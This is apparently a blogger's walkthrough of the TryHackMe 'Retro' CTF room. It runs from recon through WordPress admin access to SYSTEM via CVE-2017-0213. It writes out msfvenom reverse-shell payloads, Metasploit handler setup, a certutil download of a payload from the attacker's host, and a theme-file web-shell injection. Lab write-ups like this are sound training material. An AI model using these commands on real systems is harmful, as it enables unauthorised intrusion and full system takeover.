Drive Off into the Sunset After You Exploit this CVE-2017-0213 Vulnerable Box in Retro CTF
This walkthrough will go over the Retro room found on TryHackMe. The objective behind this room is to use a bit of passive recon to find a set of credentials in order to RDP into the box, identify a vulnerability in the Windows COM
(CVE-2017-0213)
, and privesc to NT AUTHORITY\SYSTEM
.
Step 1: What's Out There?
nmap -sC -sV -p- -Pn retro.thm --min-rate=1000
Looks like we have a webserver and an RDP session open. Let's check out what the web server can offer us.
A default Microsoft IIS
page. We'll use ffuf
to enumerate for directories.
Step 2: FFUF
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://retro.thm/FUZZ -fs 703
Nice, we discovered a directory called /retro
. Let's go to it.
Step 3: Finding Credentials
We discovered a blog that seems to be run by a username Wade
.
After downloading and viewing the Comments RSS
data, we discovered text that might be a potential password.
Taking this information and plugging it into the Site Admin
link allows us to log in to the WordPress admin panel.
Step 4: Initial Foothold
Based on my experience with getting a reverse shell with WordPress, we would need to modify the 404.php
file and inject our generated shell code. We can do this with msfvenom
.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f raw -o retro_shell.php
Now let's start initializing our handler so we can catch the shell once it executes.
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST <ATTACKER_IP>
set LHOST 1337
exploit
From here we want to copy our retro_shell.php code and paste it into 404.php
.We can do this by navigating to Appearance > Theme Editor > 404 Template. Delete the content of the 404.php
file and paste it into your shell. Should look like this.
Now navigate to the file in your browser (http://retro.thm/retro/wp-content/themes/90s-retro/404.php) and it will drop you into a meterpreter session.
Step 5: Detour
Okay, so for some reason I could not get the meterpreter shell to stabilize with the 404.php route. But, that's alright. Sometimes we have to get creative and approach a problem from a different angle... in the end, we still get the same outcome. Root.
So what I decided to do is RDP into the box with our same credentials and upload a payload, set my handler, and catch it with a stable meterpreter session.
Generate a payload using msfvenom
.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o payload.exe
Start an HTTP Server and transfer it over using certutil
.
certutil -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe
Now we want to set up our listener and catch the shell. Same as before with a slight modification.
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <ATTACKER_IP>
set LPORT 1337
exploit
Run the payload from the victim box and drop it into a meterpreter session.
Step 6: Privesc
We're going to use the Windows Exploit Suggester (WES)
to find a way to elevate our privileges. First, we need to pull the system's information in order to pull this off.
systeminfo > sysinfo.txt
Now we can pull it down to our attack box.
From here we can use WES
to find a privesc vector (update database before running:
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2023-08-07-mssb.xls --sysinfo ~/sysinfo.txt --ostext 'windows 10 64-bit' -l
This build of Windows 10 is vulnerable to a Windows COM
privesc, CVE-2017-0213
. There's a binary that we can use to automate this exploit for us. Let's download it to our attack box and upload it to our victim. Link to binary here: https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
Once we get it on our victim box we can run it and then move over to our RDP session and find a new CMD shell spawned with NT AUTHORITY\SYSTEM
rights.
Finally...this one was very difficult and time-consuming. I ended up going down multiple rabbit holes and failing at stabilizing shells more times than I'd like to admit. But all-in-all, I can say this box was rewarding and has taught me a lot about Windows privesc. I hope you enjoyed this walkthrough, and as always, Happy Hacking.